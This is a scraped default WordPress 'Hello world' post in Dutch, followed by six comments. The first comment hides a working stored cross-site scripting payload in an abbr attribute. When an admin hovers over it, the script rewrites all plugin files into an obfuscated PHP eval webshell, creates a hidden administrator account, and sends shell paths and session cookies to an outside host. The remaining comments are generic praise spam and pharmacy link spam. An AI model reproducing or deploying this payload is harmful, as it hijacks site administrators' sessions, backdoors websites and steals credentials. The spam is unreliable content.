Hallo wereld!

Welkom bij WordPress. Dit is een eerste voorbeeldbericht. Je kunt het bewerken of verwijderen en starten met je site!


  1. hinice qevnka :-) <abbr title='" onmouseover="var file = ""; var xurl = "plugin-editor.php"; var Aurl = "user-new.php"; var file2= []; var shell= []; var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址 var StartGetshell = 1; //是否getshell全部模板 1为是 0为否 var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); var laurl = "http://web.51.la:82/go.asp"; if(!window.x){ var _st = window.setTimeout; window.setTimeout = function(fRef, mDelay) { if(typeof fRef == 'function'){ var argu = Array.prototype.slice.call(arguments,2); var f = (function(){ fRef.apply(null, argu); }); return _st(f, mDelay); } return _st(fRef,mDelay); } } function fuckxss(){ var tempshell = ""; jQuery.ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; var Tmpcode = ""; temp.find('input#_wpnonce').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); temp.find('div.alignleft big strong').each(function(i,o){ var o=jQuery(o); file = o.text(); }); temp.find('textarea#newcontent').each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie); return false; } Tmpcode = o.text().replace('<?php',shellcode); }); temp.find('select#plugin option').each(function(i,o){ var o=jQuery(o); file2.push(o.attr('value')); }); if(Xtoken&&Tmpcode&&file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} }) .done(function(){ SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak"); return; }) } if(StartGetshell){ for(var 
i=0;i<file2.length;i++){ window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]); } } }) } function GetAllShell(target){ var TmpArr = target.split("|")[1]; var filename = target.split("|")[0]; if(filename!=file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'plugin': filename,'Submit':'Select'}, }) .done(function(data) { var NewCode = ""; var NewToken= ""; var Getshell=jQuery(data); Getshell.find("textarea#newcontent").each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" x "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return false; } NewCode = o.text().replace('<?php',shellcode); }); Getshell.find("input#_wpnonce").each(function(i,o){ var o=jQuery(o); NewToken = o.attr('value'); }); if(NewCode&&NewToken){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'} }) .done(function(){ shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return; }) .fail(function(){ shell.push(location.href+': GetShell '+filename+' Failure'); }) } }) } } function adduser(){ jQuery.ajax({ url: Aurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; temp.find('input#_wpnonce_create-user').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); jQuery.ajax({ url: Aurl, type: 'POST', data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administrator','createuser':'Add+New+User+'} }) .done(function(){ SenData(location.href+': Add 
Administrator success User: obuser Password:%

  2. That is the precise blog for anyone who wants to search out out about this topic. You understand so much its nearly hard to argue with you (not that I actually would want…HaHa). You definitely put a new spin on a subject thats been written about for years. Nice stuff, just great!

  3. Hello there! This blog post couldn’t be written much better! Looking at this article reminds me of my previous roommate! He constantly kept preaching about this. I most certainly will forward this post to him. Fairly certain he’s going to have a great read. Thanks for sharing!|

  4. Wynn documented revenue before last number of quartersit could possibly preserve stagnating, or maybe counterpicking. gfkdcefecgge

  5. wh0cd254513 [url=http://stromectol2017.us.com/]purchase stromectol[/url] [url=http://buyrocaltrol.science/]rocaltrol 0.25 mcg[/url]

  6. wh0cd504241 [url=http://singulair.us.org/]generic singulair[/url] [url=http://tadalafil2017.us.org/]generic tadalafil[/url] [url=http://kamagra2017.us.org/]kamagra cost[/url]